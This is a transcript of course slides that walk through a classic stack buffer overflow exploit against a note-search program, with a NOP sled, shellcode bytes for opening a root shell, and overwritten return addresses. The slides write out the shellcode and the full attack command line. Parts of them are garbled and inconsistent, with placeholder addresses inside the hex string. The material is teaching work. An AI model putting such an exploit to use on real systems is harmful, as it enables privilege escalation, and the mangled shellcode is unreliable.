Presentation is loading. Please wait.

Presentation is loading. Please wait.

Buffer Overflow Walk-Through

Published byJack Beasley Modified over 6 years ago

Similar presentations

Presentation on theme: "Buffer Overflow Walk-Through"— Presentation transcript:

1 Buffer Overflow Walk-Through

2 The Code

3 Change name of notesearch program in our exploit code to match course naming convention
bettersearchnote.exe 16 strcpy(command, “./bettersearchnote.exe\’”);

4 Change name of notesearch program in our exploit code to match course name in convention
Need to change source code picture with correct file name

5 Normally, Jose runs bettersearchnote program to search for notes with keywords of his choosing
Need to change source code picture with correct file name $ ./ bettersearchnote.exe “Life” Life is Beautiful

6 The exploit program is crafted to run the program on his behalf, using the function “system()”
Need to change source code picture with correct file name Verify unix_basics thing For example system(“ls”) would list the content of the current directory as though it was run from the command line $ ls unix_basics booksrc work desktop ec310code } like this except no one ever enters this at the command prompt

7 #include… int main() { system(“ls”); }
The exploit program is crafted to run the program on his behalf, using the function “system()” system_example.c #include… int main() { system(“ls”); } Need to change source code picture with correct file name $ ./system_example.exe unix_basics booksrc work desktop ec310code

8 Now, lets look at what the exploit program does…
Standard inclusion of C libraries

9 The goal of our exploit program is to open a root shell
This is machine language that opens a shell prompt for the user running the program

10 First, the set-up… This is the standard way to start a program and take in command line arguments… But you already knew that

11 Building the stack… These lines declare the variables to be used in the program Address buffer command Address Variables are placed on the stack for the main function Integer offset 270 Integer ret ptr Address Integer i

12 Allocating memory on the heap for our string command, which will be called by the function system() . Allocates 200 bytes on the heap for the string command 0x__ 200 Bytes The address of this location on the heap becomes the value of the pointer command buffer command &command offset 270 This string will eventually be run with the function system() ret ptr i

13 Allocating memory on the heap for our string command, which will be called by the function system().
The bzero function places 200 0x00’s starting at the location to which command points 200 Bytes buffer command &command offset 270 ret ptr i

14 Building the String command
This copies the string “./bettersearchnote.exe ‘“ into the location pointed to by the pointer command / b e t t e r s e a r c h n o t e e x e ‘ buffer command &command offset 270 ret ptr i

15 Add this to the address pointed to by the variable command
Next we need to find the address where the command line arguments for bettersearchnote will start! This string will eventually overflow the bettersearchnote buffer, have the program execute our malicious code, and open a shell Take the number of bytes in the current string command, until the null terminator (24 bytes). Add this to the address pointed to by the variable command and store that address in the pointer buffer. / b e t t e r s e a r c h n o t e e x e ‘ 24 Bytes + buffer command &command &command offset 270 ret ptr i

16 Specifying our custom return address
/ b e t t e r s e a r c h n o t e e x e ‘ This takes the command line argument to create our own custom offset value, but it is not used. buffer &command+24 command &command offset 270 ret ptr i

17 Specifying our custom return address
This takes the address of i and subtracts the value of offset. This value is placed in the variable ret / b e t t e r s e a r c h n o t e e x e ‘ , this value represents the address of our desired shell code execution entry point. buffer &command+24 - 270 command &command offset 270 ret ptr &i i

18 And place enough copies of our custom return address in the buffer to overwrite the original return address. / b e t t e r s e a r c h n o t e e x e ‘ Takes the address contained in ret and places it in the address pointed to by the buffer. This repeats every 4 bytes for iterations. buffer &command+24 command &command offset 270 &i &i ret &i-270 &i ptr i

19 Now the entire heap looks like this
. / b e t r s a c h n o x ' &i-270 0x00 Now the entire heap looks like this

20 Next create a buffer of filler commands, called NOPs, to help find the shell code
/ b e t t e r s e a r c h n o t e e x e ‘ &I &I &i ret 0x I – addr - 270 memset() sets a byte in memory to the value specified. In this case it puts the value 0x90 in the address pointed to by the buffer and into the next 59 addresses as well. 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 buffer &command+24 command &command 0x90 is machine code for “No Operation,” Which literally means do nothing. offset 270 ret &i-270 ptr i

21 Now the entire heap looks like this
. / b e t r s a c h n o x ' 0x90 &i-270 0x00 Now the entire heap looks like this NOP sled

22 Then place our shell code into the buffer immediately following the NOPs
/ b e t t e r s e a r c h n o t e e x e ‘ 0x90 0x90 0x90 0x90 ret 0x I – addr - 270 buffer &command+24 command &command Copies the shell code into memory after the NOP sled offset 270 ret &i-270 ptr i

23 Now the entire heap looks like this
. / b e t r s a c h n o x ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 0x00 Now the entire heap looks like this With the newly inserted shell code here

24 . / b e t r s a c h n o x ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 0x00 . / b e t r s a c h n o x ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 0x00 Close the string command with a quote so it is ready to be run by the function system() Concatenates a single quote at the end of the string command

25 Now the string command is finished and ready for execution.
/ b e t r s a c h n o x ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 0x00 Now the string command is finished and ready for execution. $ ./bettersearchnote.exe ‘\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe2\x53\x89\xe2\x53\x89\xe1\xcd\x80\x80\x&i-270\x&i-270 \x&i-270\ x&i-270\ x&i-270\ x&i-270 \ x&i-270 \ x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 ’

26 100 characters allotted to searchstring by bettersearchnote.exe
exploit_notesearch . / b e t r s a c h n o x ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 0x00 . / b e t r s a c h n o x ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 0x00 searchstring fd printing user id sfp return address bettersearchnote.exe 100 characters allotted to searchstring by bettersearchnote.exe exploit_notesearch command buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring’s allotted space. Ensuring one of our custom return addresses replaces the original return address

Download ppt "Buffer Overflow Walk-Through"

Similar presentations

Dynamic memory allocation

Dynamic memory allocation
Dynamic Memory Allocation in C.  What is Memory What is Memory  Memory Allocation in C Memory Allocation in C  Difference b\w static memory allocation.

Dynamic Memory Allocation in C.  What is Memory What is Memory  Memory Allocation in C Memory Allocation in C  Difference b\w static memory allocation.
Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.

Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
I/O: SPARC Assembly Department of Computer Science Georgia State University Georgia State University Updated Spring 2014.

I/O: SPARC Assembly Department of Computer Science Georgia State University Georgia State University Updated Spring 2014.
What is a pointer? First of all, it is a variable, just like other variables you studied So it has type, storage etc. Difference: it can only store the.

What is a pointer? First of all, it is a variable, just like other variables you studied So it has type, storage etc. Difference: it can only store the.
Current Assignments Homework 5 will be available tomorrow and is due on Sunday. Arrays and Pointers Project 2 due tonight by midnight. Exam 2 on Monday.

Current Assignments Homework 5 will be available tomorrow and is due on Sunday. Arrays and Pointers Project 2 due tonight by midnight. Exam 2 on Monday.
EC312 Review. Rules of Engagement Teams selected by instructor Host will read the entire questions. Only after, a team may “buzz” by raise of hand A team.

EC312 Review. Rules of Engagement Teams selected by instructor Host will read the entire questions. Only after, a team may “buzz” by raise of hand A team.
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.

1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Run-time Environment and Program Organization

Run-time Environment and Program Organization
Pointers Applications

Pointers Applications
University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.
System Calls 1.

System Calls 1.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Dynamic Memory Allocation The process of allocating memory at run time is known as dynamic memory allocation. C does not Inherently have this facility,

Dynamic Memory Allocation The process of allocating memory at run time is known as dynamic memory allocation. C does not Inherently have this facility,
Project 2: Initial Implementation Notes Tao Yang.

Project 2: Initial Implementation Notes Tao Yang.
ECE 103 Engineering Programming Chapter 47 Dynamic Memory Alocation Herbert G. Mayer, PSU CS Status 6/4/2014 Initial content copied verbatim from ECE 103.

ECE 103 Engineering Programming Chapter 47 Dynamic Memory Alocation Herbert G. Mayer, PSU CS Status 6/4/2014 Initial content copied verbatim from ECE 103.
Smashing the Stack Overview The Stack Region Buffer Overflow

Smashing the Stack Overview The Stack Region Buffer Overflow
Buffer Overflow. Introduction On many C implementations, it is possible to corrupt the execution stack by writing past the end of an array. Known as smash.

Buffer Overflow. Introduction On many C implementations, it is possible to corrupt the execution stack by writing past the end of an array. Known as smash.

Similar presentations

Ads by Google